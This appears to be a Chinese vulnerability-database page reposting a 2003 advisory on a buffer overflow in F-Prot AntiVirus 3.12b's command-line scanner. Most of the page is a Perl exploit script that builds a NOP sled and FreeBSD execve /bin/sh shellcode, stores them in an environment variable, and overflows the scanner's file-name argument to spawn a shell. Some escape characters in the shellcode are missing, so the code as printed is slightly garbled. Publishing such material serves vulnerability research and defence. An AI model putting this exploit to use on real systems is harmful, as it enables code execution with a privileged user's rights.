Frisk F-Prot AntiVirus 3.12b – Command Line Scanner Buffer Overflow
漏洞ID | 1053726 | 漏洞类型 | |
发布时间 | 2003-02-26 | 更新时间 | 2003-02-26 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Unix | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/6969/info
Frisk's F-Prot Antivirus for Linux and BSD is prone to a buffer overflow in file name parameters that are passed to the command line scanner. If a backup script is launched by a privileged user to scan the filesystem scans a file with an unusually long name, arbitrary code could potentially execute on the system in the security context of the script's owner.
#!/usr/bin/perl
# knud
$len = 1000;
$ret = 0xbfbffb7f; # on my 4.7-RELEASE
$nop = "x90";
$offset = 0;
$shellcode ="xebx0ex5ex31xc0x88x46x07x50x50x56". #freebsd 29bytes
"xb0x3bx50xcdx80xe8xedxffxffxffx2f". #execve /bin/sh
"x62x69x6ex2fx73x68x23"; #zillionATsafemode.org
if (@ARGV == 1) {
$offset = $ARGV[0];
}
for ($i = 0; $i < ($len - length($shellcode) - 100); $i++) {
$buffer .= $nop;
}
$buffer .= $shellcode;
print("Address: 0x", sprintf('%lx',($ret + $offset)), "n");
$new_ret = pack('l', ($ret + $offset));
for ($i += length($shellcode); $i < $len; $i += 4) {
$buffer .= $new_ret;
}
local($ENV{'EGG'}) = $buffer;
$cakeman = "ABC" . $new_ret x 247 ;
exec("f-prot $cakeman");</PRE></BODY></HTML>
FTGate POP3服务器漏洞 漏洞ID 1206108 漏洞类型 未知 发布时间 2000-12-31 更新时间 2000-12-31 CVE编号 CVE-2000-1237 CNNVD-ID CNNVD-200012-194 漏洞平台 N/A CVSS评…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666